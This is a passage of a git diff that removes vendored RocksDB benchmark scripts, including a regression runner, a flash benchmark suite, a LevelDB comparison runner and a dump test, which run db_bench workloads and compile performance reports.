-      --histogram=$HISTOGRAM \
-      --seek_nexts=$SEEK_NEXTS \
-      --stats_per_interval=$STATS_PER_INTERVAL \
-      --stats_interval_seconds=$STATS_INTERVAL_SECONDS \
-      --max_background_flushes=$MAX_BACKGROUND_FLUSHES \
-      --num_multi_db=$NUM_MULTI_DB \
-      --max_background_compactions=$MAX_BACKGROUND_COMPACTIONS \
-      --seed=$SEED) 2>&1"
-  ps_cmd="ps aux"
-  if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-    echo "Running benchmark remotely on $REMOTE_USER_AT_HOST"
-    db_bench_cmd="$SSH $REMOTE_USER_AT_HOST \"$db_bench_cmd\""
-    ps_cmd="$SSH $REMOTE_USER_AT_HOST $ps_cmd"
-  fi
-
-  ## make sure no db_bench is running
-  # The following statement is necessary make sure "eval $ps_cmd" will success.
-  # Otherwise, if we simply check whether "$(eval $ps_cmd | grep db_bench)" is
-  # successful or not, then it will always be false since grep will return
-  # non-zero status when there's no matching output.
-  ps_output="$(eval $ps_cmd)"
-  exit_on_error $? "$ps_cmd"
-
-  # perform the actual command to check whether db_bench is running
-  grep_output="$(eval $ps_cmd | grep db_bench | grep -v grep)"
-  if [ "$grep_output" != "" ]; then
-    echo "Stopped regression_test.sh as there're still db_bench processes running:"
-    echo $grep_output
-    echo "Clean up test directory"
-    cleanup_test_directory $TEST_ROOT_DIR
-    exit 2
-  fi
-
-  ## run the db_bench
-  cmd="($db_bench_cmd || db_bench_error=1) | tee -a $RESULT_PATH/$1"
-  exit_on_error $?
-  echo $cmd
-  eval $cmd
-  exit_on_error $db_bench_error
-  if [ $UPDATE_REPORT -ne 0 ]; then
-    update_report "$1" "$RESULT_PATH/$1" $ops $threads
-  fi
-}
-
-function build_checkpoint {
-    cmd_prefix=""
-    if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-        cmd_prefix="$SSH $REMOTE_USER_AT_HOST "
-    fi
-    if [ $NUM_MULTI_DB -gt 1 ]; then
-        dirs=$($cmd_prefix find $ORIGIN_PATH -type d -links 2)
-        for dir in $dirs; do
-            db_index=$(basename $dir)
-            echo "Building checkpoints: $ORIGIN_PATH/$db_index -> $DB_PATH/$db_index ..."
-            $cmd_prefix $DB_BENCH_DIR/ldb checkpoint --checkpoint_dir=$DB_PATH/$db_index \
-                        --db=$ORIGIN_PATH/$db_index 2>&1
-        done
-    else
-        # checkpoint cannot build in directory already exists
-        $cmd_prefix rm -rf $DB_PATH
-        echo "Building checkpoint: $ORIGIN_PATH -> $DB_PATH ..."
-        $cmd_prefix $DB_BENCH_DIR/ldb checkpoint --checkpoint_dir=$DB_PATH \
-                    --db=$ORIGIN_PATH 2>&1
-    fi
-}
-
-function multiply {
-  echo "$1 * $2" | bc
-}
-
-# $1 --- name of the benchmark
-# $2 --- the filename of the output log of db_bench
-function update_report {
-  main_result=`cat $2 | grep $1`
-  exit_on_error $?
-  perc_statement=`cat $2 | grep Percentile`
-  exit_on_error $?
-
-  # Obtain micros / op
-
-  [[ $main_result =~ $MAIN_PATTERN ]]
-  ops_per_s=${BASH_REMATCH[1]}
-
-  # Obtain percentile information
-  [[ $perc_statement =~ $PERC_PATTERN ]]
-  perc[0]=${BASH_REMATCH[1]}  # p50
-  perc[1]=${BASH_REMATCH[2]}  # p75
-  perc[2]=${BASH_REMATCH[3]}  # p99
-  perc[3]=${BASH_REMATCH[4]}  # p99.9
-  perc[4]=${BASH_REMATCH[5]}  # p99.99
-
-  # Parse the output of the time command
-  real_sec=`tail -3 $2 | grep real | awk '{print $2}'`
-  user_sec=`tail -3 $2 | grep user | awk '{print $2}'`
-  sys_sec=`tail -3 $2 | grep sys | awk '{print $2}'`
-
-  (printf "$DATA_FORMAT" \
-    $COMMIT_ID $1 $REMOTE_USER_AT_HOST $NUM_MULTI_DB $NUM_KEYS $KEY_SIZE $VALUE_SIZE \
-       $(multiply $COMPRESSION_RATIO 100) \
-       $3 $4 $CACHE_SIZE \
-       $MAX_BACKGROUND_FLUSHES $MAX_BACKGROUND_COMPACTIONS \
-       $ops_per_s \
-       $(multiply ${perc[0]} 1000) \
-       $(multiply ${perc[1]} 1000) \
-       $(multiply ${perc[2]} 1000) \
-       $(multiply ${perc[3]} 1000) \
-       $(multiply ${perc[4]} 1000) \
-       $DEBUG \
-       $real_sec \
-       $user_sec \
-       $sys_sec \
-       >> $SUMMARY_FILE)
-  exit_on_error $?
-}
-
-function exit_on_error {
-  if [ $1 -ne 0 ]; then
-    echo ""
-    echo "ERROR: Benchmark did not complete successfully."
-    if ! [ -z "$2" ]; then
-      echo "Failure command: $2"
-    fi
-    echo "Partial results are output to $RESULT_PATH"
-    echo "ERROR" >> $SUMMARY_FILE
-    exit $1
-  fi
-}
-
-function checkout_rocksdb {
-  echo "Checking out commit $1 ..."
-
-  git fetch --all
-  exit_on_error $?
-
-  git checkout $1
-  exit_on_error $?
-}
-
-function build_db_bench_and_ldb {
-  echo "Building db_bench & ldb ..."
-
-  make clean
-  exit_on_error $?
-
-  DEBUG_LEVEL=0 make db_bench ldb -j32
-  exit_on_error $?
-}
-
-function run_remote {
-  test_remote "$1"
-  exit_on_error $? "$1"
-}
-
-function test_remote {
-  if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      cmd="$SSH $REMOTE_USER_AT_HOST '$1'"
-  else
-      cmd="$1"
-  fi
-  eval "$cmd"
-}
-
-function run_local {
-  eval "$1"
-  exit_on_error $?
-}
-
-function setup_options_file {
-  if ! [ -z "$OPTIONS_FILE" ]; then
-    if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      options_file="$DB_BENCH_DIR/OPTIONS_FILE"
-      run_local "$SCP $OPTIONS_FILE $REMOTE_USER_AT_HOST:$options_file"
-    else
-      options_file="$OPTIONS_FILE"
-    fi
-    echo "--options_file=$options_file"
-  fi
-  echo ""
-}
-
-function setup_test_directory {
-  echo "Deleting old regression test directories and creating new ones"
-
-  run_remote "rm -rf $DB_PATH"
-  run_remote "rm -rf $DB_BENCH_DIR"
-  run_local "rm -rf $RESULT_PATH"
-
-  if ! [ -z "$WAL_PATH" ]; then
-    run_remote "rm -rf $WAL_PATH"
-    run_remote "mkdir -p $WAL_PATH"
-  fi
-
-  run_remote "mkdir -p $DB_PATH"
-
-  run_remote "mkdir -p $DB_BENCH_DIR"
-  run_remote "ls -l $DB_BENCH_DIR"
-
-  if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      run_local "$SCP ./db_bench $REMOTE_USER_AT_HOST:$DB_BENCH_DIR/db_bench"
-      run_local "$SCP ./ldb $REMOTE_USER_AT_HOST:$DB_BENCH_DIR/ldb"
-  fi
-
-  run_local "mkdir -p $RESULT_PATH"
-
-  (printf $TITLE_FORMAT \
-      "commit id" "benchmark" "user@host" "num-dbs" "key-range" "key-size" \
-      "value-size" "compress-rate" "ops-per-thread" "num-threads" "cache-size" \
-      "flushes" "compactions" \
-      "ops-per-s" "p50" "p75" "p99" "p99.9" "p99.99" "debug" \
-      "real-sec" "user-sec" "sys-sec" \
-      >> $SUMMARY_FILE)
-  exit_on_error $?
-}
-
-function cleanup_test_directory {
-
-  if [ $DELETE_TEST_PATH -ne 0 ]; then
-    echo "Clear old regression test directories and creating new ones"
-    run_remote "rm -rf $DB_PATH"
-    run_remote "rm -rf $WAL_PATH"
-    if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      run_remote "rm -rf $DB_BENCH_DIR"
-    fi
-    run_remote "rm -rf $1"
-  else
-    echo "------------ DEBUG MODE ------------"
-    echo "DB  PATH: $DB_PATH"
-    echo "WAL PATH: $WAL_PATH"
-  fi
-}
-
-############################################################################
-
-main $@
diff --git a/thirdparty/rocksdb/tools/rocksdb_dump_test.sh b/thirdparty/rocksdb/tools/rocksdb_dump_test.sh
deleted file mode 100755
index 2cf8c06..0000000
--- a/thirdparty/rocksdb/tools/rocksdb_dump_test.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-TESTDIR=`mktemp -d ${TMPDIR:-/tmp}/rocksdb-dump-test.XXXXX`
-DUMPFILE="tools/sample-dump.dmp"
-
-# Verify that the sample dump file is undumpable and then redumpable.
-./rocksdb_undump --dump_location=$DUMPFILE --db_path=$TESTDIR/db
-./rocksdb_dump --anonymous --db_path=$TESTDIR/db --dump_location=$TESTDIR/dump
-cmp $DUMPFILE $TESTDIR/dump
diff --git a/thirdparty/rocksdb/tools/run_flash_bench.sh b/thirdparty/rocksdb/tools/run_flash_bench.sh
deleted file mode 100755
index 4d9d0d5..0000000
--- a/thirdparty/rocksdb/tools/run_flash_bench.sh
+++ /dev/null
@@ -1,358 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: benchmark.sh exists in the current directory
-# After execution of this script, log files are generated in $output_dir.
-# report.txt provides a high level statistics
-
-# This should be run from the parent of the tools directory. The command line is:
-#   [$env_vars] tools/run_flash_bench.sh [list-of-threads]
-#
-# This runs a sequence of tests in the following sequence:
-#   step 1) load - bulkload, compact, fillseq, overwrite
-#   step 2) read-only for each number of threads
-#   step 3) read-write for each number of threads
-#   step 4) merge for each number of threads
-#
-# The list of threads is optional and when not set is equivalent to "24". 
-# Were list-of-threads specified as "1 2 4" then the tests in steps 2, 3 and
-# 4 above would be repeated for 1, 2 and 4 threads. The tests in step 1 are
-# only run for 1 thread.
-
-# Test output is written to $OUTPUT_DIR, currently /tmp/output. The performance
-# summary is in $OUTPUT_DIR/report.txt. There is one file in $OUTPUT_DIR per
-# test and the tests are listed below.
-#
-# The environment variables are also optional. The variables are:
-#
-#   NKEYS         - number of key/value pairs to load
-#   BG_MBWRITEPERSEC - write rate limit in MB/second for tests in which
-#                   there is one thread doing writes and stats are
-#                   reported for read threads. "BG" stands for background.
-#                   If this is too large then the non-writer threads can get
-#                   starved. This is used for the "readwhile" tests.
-#   FG_MBWRITEPERSEC - write rate limit in MB/second for tests like overwrite
-#                   where stats are reported for the write threads.
-#   NSECONDS      - number of seconds for which to run each test in steps 2,
-#                   3 and 4. There are currently 15 tests in those steps and
-#                   they are repeated for each entry in list-of-threads so
-#                   this variable lets you control the total duration to
-#                   finish the benchmark.
-#   RANGE_LIMIT   - the number of rows to read per range query for tests that
-#                   do range queries.
-#   VAL_SIZE      - the length of the value in the key/value pairs loaded.
-#                   You can estimate the size of the test database from this,
-#                   NKEYS and the compression rate (--compression_ratio) set
-#                   in tools/benchmark.sh
-#   BLOCK_LENGTH  - value for db_bench --block_size
-#   CACHE_BYTES   - the size of the RocksDB block cache in bytes
-#   DATA_DIR      - directory in which to create database files
-#   LOG_DIR       - directory in which to create WAL files, may be the same
-#                   as DATA_DIR
-#   DO_SETUP      - when set to 0 then a backup of the database is copied from
-#                   $DATA_DIR.bak to $DATA_DIR and the load tests from step 1
-#                   The WAL directory is also copied from a backup if
-#                   DATA_DIR != LOG_DIR. This allows tests from steps 2, 3, 4
-#                   to be repeated faster.
-#   SAVE_SETUP    - saves a copy of the database at the end of step 1 to
-#                   $DATA_DIR.bak. When LOG_DIR != DATA_DIR then it is copied
-#                   to $LOG_DIR.bak.
-#   SKIP_LOW_PRI_TESTS - skip some of the tests which aren't crucial for getting
-#                   actionable benchmarking data (look for keywords "bulkload",
-#                   "sync=1", and "while merging").
-#
-
-# Size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-num_keys=${NKEYS:-$((1 * G))}
-# write rate for readwhile... tests
-bg_mbwps=${BG_MBWRITEPERSEC:-4}
-# write rate for tests other than readwhile, 0 means no limit
-fg_mbwps=${FG_MBWRITEPERSEC:-0}
-duration=${NSECONDS:-$((60 * 60))}
-nps=${RANGE_LIMIT:-10}
-vs=${VAL_SIZE:-400}
-cs=${CACHE_BYTES:-$(( 1 * G ))}
-bs=${BLOCK_LENGTH:-8192}
-
-# If no command line arguments then run for 24 threads.
-if [[ $# -eq 0 ]]; then
-  nthreads=( 24 )
-else
-  nthreads=( "$@" )
-fi
-
-for num_thr in "${nthreads[@]}" ; do
-  echo Will run for $num_thr threads
-done
-
-# Update these parameters before execution !!!
-db_dir=${DATA_DIR:-"/tmp/rocksdb/"}
-wal_dir=${LOG_DIR:-"/tmp/rocksdb/"}
-
-do_setup=${DO_SETUP:-1}
-save_setup=${SAVE_SETUP:-0}
-
-# By default we'll run all the tests. Set this to skip a set of tests which
-# aren't critical for getting key metrics.
-skip_low_pri_tests=${SKIP_LOW_PRI_TESTS:-0}
-
-if [[ $skip_low_pri_tests == 1 ]]; then
-  echo "Skipping some non-critical tests because SKIP_LOW_PRI_TESTS is set."
-fi
-
-output_dir="${TMPDIR:-/tmp}/output"
-
-ARGS="\
-OUTPUT_DIR=$output_dir \
-NUM_KEYS=$num_keys \
-DB_DIR=$db_dir \
-WAL_DIR=$wal_dir \
-VALUE_SIZE=$vs \
-BLOCK_SIZE=$bs \
-CACHE_SIZE=$cs"
-
-mkdir -p $output_dir
-echo -e "ops/sec\tmb/sec\tSize-GB\tL0_GB\tSum_GB\tW-Amp\tW-MB/s\tusec/op\tp50\tp75\tp99\tp99.9\tp99.99\tUptime\tStall-time\tStall%\tTest" \
-  > $output_dir/report.txt
-
-# Notes on test sequence:
-#   step 1) Setup database via sequential fill followed by overwrite to fragment it.
-#           Done without setting DURATION to make sure that overwrite does $num_keys writes
-#   step 2) read-only tests for all levels of concurrency requested
-#   step 3) non read-only tests for all levels of concurrency requested
-#   step 4) merge tests for all levels of concurrency requested. These must come last.
-
-###### Setup the database
-
-if [[ $do_setup != 0 ]]; then
-  echo Doing setup
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 1: bulk load
-    env $ARGS ./tools/benchmark.sh bulkload
-  fi
-
-  # Test 2a: sequential fill with large values to get peak ingest
-  #          adjust NUM_KEYS given the use of larger values
-  env $ARGS BLOCK_SIZE=$((1 * M)) VALUE_SIZE=$((32 * K)) NUM_KEYS=$(( num_keys / 64 )) \
-       ./tools/benchmark.sh fillseq_disable_wal
-
-  # Test 2b: sequential fill with the configured value size
-  env $ARGS ./tools/benchmark.sh fillseq_disable_wal
-
-  # Test 2c: same as 2a, but with WAL being enabled.
-  env $ARGS BLOCK_SIZE=$((1 * M)) VALUE_SIZE=$((32 * K)) NUM_KEYS=$(( num_keys / 64 )) \
-       ./tools/benchmark.sh fillseq_enable_wal
-
-  # Test 2d: same as 2b, but with WAL being enabled.
-  env $ARGS ./tools/benchmark.sh fillseq_enable_wal
-
-  # Test 3: single-threaded overwrite
-  env $ARGS NUM_THREADS=1 DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh overwrite
-
-else
-  echo Restoring from backup
-
-  rm -rf $db_dir
-
-  if [ ! -d ${db_dir}.bak ]; then
-    echo Database backup does not exist at ${db_dir}.bak
-    exit -1
-  fi
-
-  echo Restore database from ${db_dir}.bak
-  cp -p -r ${db_dir}.bak $db_dir
-
-  if [[ $db_dir != $wal_dir ]]; then
-    rm -rf $wal_dir
-
-    if [ ! -d ${wal_dir}.bak ]; then
-      echo WAL backup does not exist at ${wal_dir}.bak
-      exit -1
-    fi
-
-    echo Restore WAL from ${wal_dir}.bak
-    cp -p -r ${wal_dir}.bak $wal_dir
-  fi
-fi
-
-if [[ $save_setup != 0 ]]; then
-  echo Save database to ${db_dir}.bak
-  cp -p -r $db_dir ${db_dir}.bak
-
-  if [[ $db_dir != $wal_dir ]]; then
-    echo Save WAL to ${wal_dir}.bak
-    cp -p -r $wal_dir ${wal_dir}.bak
-  fi
-fi
-
-###### Read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 4: random read
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr ./tools/benchmark.sh readrandom
-
-  # Test 5: random range scans
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr NUM_NEXTS_PER_SEEK=$nps \
-    ./tools/benchmark.sh fwdrange
-
-  # Test 6: random reverse range scans
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr NUM_NEXTS_PER_SEEK=$nps \
-    ./tools/benchmark.sh revrange
-done
-
-###### Non read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 7: overwrite with sync=0
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-    DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh overwrite
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 8: overwrite with sync=1
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-      ./tools/benchmark.sh overwrite
-  fi
-
-  # Test 9: random update with sync=0
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr DB_BENCH_NO_SYNC=1 \
-      ./tools/benchmark.sh updaterandom
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 10: random update with sync=1
-   env $ARGS DURATION=$duration NUM_THREADS=$num_thr ./tools/benchmark.sh updaterandom
-  fi
-
-  # Test 11: random read while writing
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-    DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh readwhilewriting
-
-  # Test 12: range scan while writing
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-    DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh fwdrangewhilewriting
-
-  # Test 13: reverse range scan while writing
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-    DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh revrangewhilewriting
-done
-
-###### Merge tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 14: random merge with sync=0
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-    DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh mergerandom
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 15: random merge with sync=1
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-      ./tools/benchmark.sh mergerandom
-
-    # Test 16: random read while merging 
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-      DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh readwhilemerging
-
-    # Test 17: range scan while merging 
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-      DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh fwdrangewhilemerging
-
-    # Test 18: reverse range scan while merging 
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-      DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh revrangewhilemerging
-  fi
-done
-
-###### Universal compaction tests.
-
-# Use a single thread to reduce the variability in the benchmark.
-env $ARGS COMPACTION_TEST=1 NUM_THREADS=1 ./tools/benchmark.sh universal_compaction
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo bulkload > $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep bulkload $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-echo fillseq_wal_disabled >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fillseq.wal_disabled $output_dir/report.txt >> $output_dir/report2.txt
-
-echo fillseq_wal_enabled >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fillseq.wal_enabled $output_dir/report.txt >> $output_dir/report2.txt
-
-echo overwrite sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep overwrite $output_dir/report.txt | grep \.s0  >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo overwrite sync=1 >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep overwrite $output_dir/report.txt | grep \.s1  >> $output_dir/report2.txt
-fi
-
-echo updaterandom sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep updaterandom $output_dir/report.txt | grep \.s0 >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo updaterandom sync=1 >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep updaterandom $output_dir/report.txt | grep \.s1 >> $output_dir/report2.txt
-fi
-
-echo mergerandom sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep mergerandom $output_dir/report.txt | grep \.s0 >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo mergerandom sync=1 >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep mergerandom $output_dir/report.txt | grep \.s1 >> $output_dir/report2.txt
-fi
-
-echo readrandom >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readrandom $output_dir/report.txt  >> $output_dir/report2.txt
-
-echo fwdrange >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fwdrange\.t $output_dir/report.txt >> $output_dir/report2.txt
-
-echo revrange >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep revrange\.t $output_dir/report.txt >> $output_dir/report2.txt
-
-echo readwhile >> $output_dir/report2.txt >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readwhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo readwhile >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep readwhilemerging $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-echo fwdreadwhilewriting >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fwdrangewhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo fwdreadwhilemerging >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep fwdrangewhilemerg $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-echo revreadwhilewriting >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep revrangewhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo revreadwhilemerging >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep revrangewhilemerg $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-cat $output_dir/report2.txt
diff --git a/thirdparty/rocksdb/tools/run_leveldb.sh b/thirdparty/rocksdb/tools/run_leveldb.sh
deleted file mode 100755
index de628c3..0000000
--- a/thirdparty/rocksdb/tools/run_leveldb.sh
+++ /dev/null
@@ -1,174 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: benchmark_leveldb.sh exists in the current directory
-# After execution of this script, log files are generated in $output_dir.
-# report.txt provides a high level statistics
-#
-# This should be used with the LevelDB fork listed here to use additional test options.
-# For more details on the changes see the blog post listed below.
-#   https://github.com/mdcallag/leveldb-1
-#   http://smalldatum.blogspot.com/2015/04/comparing-leveldb-and-rocksdb-take-2.html
-#
-# This should be run from the parent of the tools directory. The command line is:
-#   [$env_vars] tools/run_flash_bench.sh [list-of-threads]
-#
-# This runs a sequence of tests in the following sequence:
-#   step 1) load - bulkload, compact, fillseq, overwrite
-#   step 2) read-only for each number of threads
-#   step 3) read-write for each number of threads
-#
-# The list of threads is optional and when not set is equivalent to "24". 
-# Were list-of-threads specified as "1 2 4" then the tests in steps 2, 3 and
-# 4 above would be repeated for 1, 2 and 4 threads. The tests in step 1 are
-# only run for 1 thread.
-
-# Test output is written to $OUTPUT_DIR, currently /tmp/output. The performance
-# summary is in $OUTPUT_DIR/report.txt. There is one file in $OUTPUT_DIR per
-# test and the tests are listed below.
-#
-# The environment variables are also optional. The variables are:
-#   NKEYS         - number of key/value pairs to load
-#   NWRITESPERSEC - the writes/second rate limit for the *whilewriting* tests.
-#                   If this is too large then the non-writer threads can get
-#                   starved.
-#   VAL_SIZE      - the length of the value in the key/value pairs loaded.
-#                   You can estimate the size of the test database from this,
-#                   NKEYS and the compression rate (--compression_ratio) set
-#                   in tools/benchmark_leveldb.sh
-#   BLOCK_LENGTH  - value for db_bench --block_size
-#   CACHE_BYTES   - the size of the RocksDB block cache in bytes
-#   DATA_DIR      - directory in which to create database files
-#   DO_SETUP      - when set to 0 then a backup of the database is copied from
-#                   $DATA_DIR.bak to $DATA_DIR and the load tests from step 1
-#                   This allows tests from steps 2, 3 to be repeated faster.
-#   SAVE_SETUP    - saves a copy of the database at the end of step 1 to
-#                   $DATA_DIR.bak.
-
-# Size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-num_keys=${NKEYS:-$((1 * G))}
-wps=${NWRITESPERSEC:-$((10 * K))}
-vs=${VAL_SIZE:-400}
-cs=${CACHE_BYTES:-$(( 1 * G ))}
-bs=${BLOCK_LENGTH:-4096}
-
-# If no command line arguments then run for 24 threads.
-if [[ $# -eq 0 ]]; then
-  nthreads=( 24 )
-else
-  nthreads=( "$@" )
-fi
-
-for num_thr in "${nthreads[@]}" ; do
-  echo Will run for $num_thr threads
-done
-
-# Update these parameters before execution !!!
-db_dir=${DATA_DIR:-"/tmp/rocksdb/"}
-
-do_setup=${DO_SETUP:-1}
-save_setup=${SAVE_SETUP:-0}
-
-output_dir="${TMPDIR:-/tmp}/output"
-
-ARGS="\
-OUTPUT_DIR=$output_dir \
-NUM_KEYS=$num_keys \
-DB_DIR=$db_dir \
-VALUE_SIZE=$vs \
-BLOCK_SIZE=$bs \
-CACHE_SIZE=$cs"
-
-mkdir -p $output_dir
-echo -e "ops/sec\tmb/sec\tusec/op\tavg\tp50\tTest" \
-  > $output_dir/report.txt
-
-# Notes on test sequence:
-#   step 1) Setup database via sequential fill followed by overwrite to fragment it.
-#           Done without setting DURATION to make sure that overwrite does $num_keys writes
-#   step 2) read-only tests for all levels of concurrency requested
-#   step 3) non read-only tests for all levels of concurrency requested
-
-###### Setup the database
-
-if [[ $do_setup != 0 ]]; then
-  echo Doing setup
-
-  # Test 2a: sequential fill with large values to get peak ingest
-  #          adjust NUM_KEYS given the use of larger values
-  env $ARGS BLOCK_SIZE=$((1 * M)) VALUE_SIZE=$((32 * K)) NUM_KEYS=$(( num_keys / 64 )) \
-       ./tools/benchmark_leveldb.sh fillseq
-
-  # Test 2b: sequential fill with the configured value size
-  env $ARGS ./tools/benchmark_leveldb.sh fillseq
-
-  # Test 3: single-threaded overwrite
-  env $ARGS NUM_THREADS=1 DB_BENCH_NO_SYNC=1 ./tools/benchmark_leveldb.sh overwrite
-
-else
-  echo Restoring from backup
-
-  rm -rf $db_dir
-
-  if [ ! -d ${db_dir}.bak ]; then
-    echo Database backup does not exist at ${db_dir}.bak
-    exit -1
-  fi
-
-  echo Restore database from ${db_dir}.bak
-  cp -p -r ${db_dir}.bak $db_dir
-fi
-
-if [[ $save_setup != 0 ]]; then
-  echo Save database to ${db_dir}.bak
-  cp -p -r $db_dir ${db_dir}.bak
-fi
-
-###### Read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 4: random read
-  env $ARGS NUM_THREADS=$num_thr ./tools/benchmark_leveldb.sh readrandom
-
-done
-
-###### Non read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 7: overwrite with sync=0
-  env $ARGS NUM_THREADS=$num_thr DB_BENCH_NO_SYNC=1 \
-    ./tools/benchmark_leveldb.sh overwrite
-
-  # Test 8: overwrite with sync=1
-  # Not run for now because LevelDB db_bench doesn't have an option to limit the
-  # test run to X seconds and doing sync-per-commit for --num can take too long.
-  # env $ARGS NUM_THREADS=$num_thr ./tools/benchmark_leveldb.sh overwrite
-
-  # Test 11: random read while writing
-  env $ARGS NUM_THREADS=$num_thr WRITES_PER_SECOND=$wps \
-    ./tools/benchmark_leveldb.sh readwhilewriting
-
-done
-
-echo bulkload > $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep bulkload $output_dir/report.txt >> $output_dir/report2.txt
-echo fillseq >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fillseq $output_dir/report.txt >> $output_dir/report2.txt
-echo overwrite sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep overwrite $output_dir/report.txt | grep \.s0  >> $output_dir/report2.txt
-echo overwrite sync=1 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep overwrite $output_dir/report.txt | grep \.s1  >> $output_dir/report2.txt
-echo readrandom >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readrandom $output_dir/report.txt  >> $output_dir/report2.txt
-echo readwhile >> $output_dir/report2.txt >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readwhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-cat $output_dir/report2.txt
diff --git a/thirdparty/rocksdb/tools/sample-dump.dmp b/thirdparty/rocksdb/tools/sample-dump.dmp
deleted file mode 100644
index 4ec3a77..0000000
--- a/thirdparty/rocksdb/tools/sample-dump.dmp
+++ /dev/null
Binary files differ
